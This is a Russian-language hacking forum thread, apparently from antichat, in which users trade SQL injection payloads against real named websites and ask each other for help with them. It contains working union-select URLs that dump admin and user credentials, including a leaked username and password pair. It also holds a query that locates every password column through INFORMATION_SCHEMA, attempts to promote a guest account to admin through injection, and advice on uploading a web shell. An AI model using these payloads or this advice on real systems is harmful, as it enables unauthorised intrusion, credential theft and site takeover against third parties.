1. http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,version(),%20%206,7,8,9,10,11,12/* 2. http://www.aroma-france.info/parfums.php?poll=17'+order+by+5--+
полный путь куда тебе надо залить шелл например /server/www/public_html/site/images/shell.php у каждого сайта свой путь по поводу путей опять же поищи на форумe
Arigona Поиск по форуму, вот одна из тем: https://forum.antichat.ru/threadnav34338-1-10.html В этой теме , несколько страниц назад, велась та=же беседа на 10 листов, можешь почитать отсюда посты kevmen'а и ответы на них: https://forum.antichat.ru/threadnav46016-502-10.html не нужно её повторять, пожалуйста
У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2 чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?
Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!
Народ,нужна помощь...думаю даже вам будет интересно...и так: есть скуль(5 ветка) Code: http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,username,3,password,5,6,7,8,9,10,11%20%20FROM%20admin login : admin pass : root78 есть админка Code: http://www.krimsex.com/admin.php пароль не подходит. вопрос..почему? ето не все, то была табла admin,есть ещё табла users Code: http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,login,3,password,5,6,7,8,9,10,11%20%20FROM%20users пробывал лимитом 10 акков,не один не подошол.. вход для юзеров тут: Code: http://www.krimsex.com/login.php Очень большая просьба помочь
http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1+offset+20)-- Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36 ЗЫ: postgre_sql()
Вот запрос - выдергивает все таблицы, в которых есть колонка "password" Code: UNION+SELECT+group_concat(table_name)+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264-- так же в хексе можна вставить любое название колонки
www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='таблица'-- offset - это тот же limit в MYSQL. TELO, Надо не хексить, а переводить в char.. К тому же, вопрос был совсем другой.
Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1
Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.
